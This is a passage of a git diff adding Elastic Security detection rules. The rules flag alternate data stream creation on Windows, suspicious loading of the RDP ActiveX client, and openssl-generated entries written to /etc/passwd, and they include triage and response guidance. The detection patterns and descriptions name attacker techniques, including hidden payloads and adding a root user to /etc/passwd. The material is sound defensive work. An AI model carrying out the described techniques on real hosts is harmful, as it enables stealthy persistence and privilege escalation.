analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 114 + }, + "id": "71bccb61-e19b-452f-b104-79a60e546a95_114", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_108.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_108.json new file mode 100644 index 00000000000..d240a5d8ca0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_108.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious RDP ActiveX Client Loaded", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"mstscax.dll\" or file.name : \"mstscax.dll\") and\n /* depending on noise in your env add here extra paths */\n process.executable : (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vmconnect.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsSandboxClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\hvsirdpclient.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "71c5cb27-eca5-4151-bb47-64bc3f883270_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_109.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_109.json new file mode 100644 index 00000000000..074f5477b6b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_109.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious RDP ActiveX Client Loaded", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"mstscax.dll\" or file.name : \"mstscax.dll\") and\n /* depending on noise in your env add here extra paths */\n process.executable : (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vmconnect.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsSandboxClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\hvsirdpclient.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "71c5cb27-eca5-4151-bb47-64bc3f883270_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_1.json b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_1.json new file mode 100644 index 00000000000..1f025268db2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_1.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the \"/etc/passwd\" file. The \"/etc/passwd\" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the \"/etc/passwd\" file permissions or other privileges to add a new entry to the \"/etc/passwd\" file with root permissions, and leverage this new user account to login as root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Passwd File Event Action", + "query": "sequence by host.id, process.parent.pid with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"openssl\" and process.args == \"passwd\" and user.id != \"0\"]\n [file where event.dataset == \"auditd_manager.auditd\" and host.os.type == \"linux\" and file.path == \"/etc/passwd\" and\n process.parent.pid != 1 and not auditd.data.a2 == \"80000\" and event.outcome == \"success\" and user.id != \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71d6a53d-abbd-40df-afee-c21fff6aafb0", + "setup": "\nThis rule requires data coming in from Elastic Defend and Auditd Manager.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/passwd -p wa -k etcpasswd\"\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 1 + }, + "id": "71d6a53d-abbd-40df-afee-c21fff6aafb0_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_2.json b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_2.json new file mode 100644 index 00000000000..03643ee1de9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_2.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the \"/etc/passwd\" file. The \"/etc/passwd\" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the \"/etc/passwd\" file permissions or other privileges to add a new entry to the \"/etc/passwd\" file with root permissions, and leverage this new user account to login as root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Passwd File Event Action", + "query": "sequence by host.id, process.parent.pid with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"openssl\" and process.args == \"passwd\" and user.id != \"0\"]\n [file where host.os.type == \"linux\" and file.path == \"/etc/passwd\" and process.parent.pid != 1 and\n not auditd.data.a2 == \"80000\" and event.outcome == \"success\" and user.id != \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71d6a53d-abbd-40df-afee-c21fff6aafb0", + "setup": "\nThis rule requires data coming in from Elastic Defend and Auditd Manager.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/passwd -p wa -k etcpasswd\"\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "71d6a53d-abbd-40df-afee-c21fff6aafb0_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_3.json b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_3.json new file mode 100644 index 00000000000..45282fb7501 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_3.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the \"/etc/passwd\" file. The \"/etc/passwd\" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the \"/etc/passwd\" file permissions or other privileges to add a new entry to the \"/etc/passwd\" file with root permissions, and leverage this new user account to login as root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Passwd File Event Action", + "query": "sequence by host.id, process.parent.pid with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"openssl\" and process.args == \"passwd\" and user.id != \"0\"]\n [file where host.os.type == \"linux\" and file.path == \"/etc/passwd\" and process.parent.pid != 1 and\n not auditd.data.a2 == \"80000\" and event.outcome == \"success\" and user.id != \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": 